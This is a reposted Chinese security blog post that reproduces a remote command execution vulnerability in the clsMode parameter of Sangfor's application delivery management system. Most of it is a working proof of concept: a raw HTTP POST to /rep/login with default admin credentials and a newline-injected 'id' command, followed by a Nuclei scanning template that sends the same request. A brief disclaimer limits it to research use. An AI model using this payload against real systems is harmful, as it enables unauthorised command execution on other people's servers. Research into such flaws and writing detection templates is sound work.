漏洞概述
深信服应用交付管理系统clsMode存在远程命令执行漏洞,攻击者可利用该漏洞执行系统命令。
漏洞复现
POC:
POST /rep/login HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A
NUCLEI POC
id: sangfor-ad-clsmode-rce
info:
name: 深信服应用交付管理系统clsMode远程命令执行漏洞
author: YGnight
severity: high
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |-
POST /rep/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 120
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
userID=admin&userPsw=admin&page=login&log_type=report&index=index&clsMode=cls_mode_login%0Aid%0A
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'suid'
原文始发于微信公众号(night安全):【漏洞复现】深信服应用交付管理系统clsMode存在远程命令执行漏洞 附POC
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论